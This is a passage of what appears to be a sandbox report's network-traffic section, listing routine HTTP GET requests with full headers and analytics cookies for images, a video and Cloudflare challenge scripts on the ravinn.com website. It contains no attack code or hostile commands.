            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/The-Latest.svg HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/logo3.png HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/AITC.png HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/logo.png HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/australia.svg HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2025/03/VEC_logo_RGB.png HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/About-Ravinn.svg HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/veterans.png HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/12/strategy.jpg HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/Cyber-Threat-Intelligence.jpg HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/Incident-Response.jpg HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/Ravinn-desktop-1600x800-1.mp4 HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, *;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoReferer: https://www.ravinn.com/Accept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==Range: bytes=0-
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js? HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/cropped-favicon-32x32.png HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==; cf_clearance=pJx8ZNRZkZcUrG_3mSlt488DHD0r5hm_cGlE.Jo74vY-1743549630-1.2.1.1-0sbYGTIsiQP8R6kNvx_1NfNsm5ASeo7Ck_DDgRCEy92rPtjUtW.wwNv0vlr5xvGV_SDQ_7MUQOpFxggG6UGX6y0bJrN9HZvDhDcmSbSVX6T5adB1RxeFSP5LTqDGKOwI04KjzNKiajgpVL1Z.903KVv3w0RMxcipHEwmEUS5sY0NYj_60cwQriWLOiSqoG_ZOsPmCvjm7Xc3.lDYsJmuVSD0cFIP5EcFvV7PzDUJLwEl_Bb0AHCT4XoXNjWNUsZJj_U_tkDFiAlejmb_vBdEjpCvueUdvlYwPzZxlpHPoglEsaFLLWww6ntnnXMY.deqwXWNqDqbd9HQtCJKihXUWY4MPvdvhr9o7I38nHbdGGU
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/The-Team.svg HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/The-Latest.svg HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/australia.svg HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/044-R141223.jpg HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2025/03/VEC_logo_RGB.png HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/veterans.png HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/12/strategy.jpg HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; 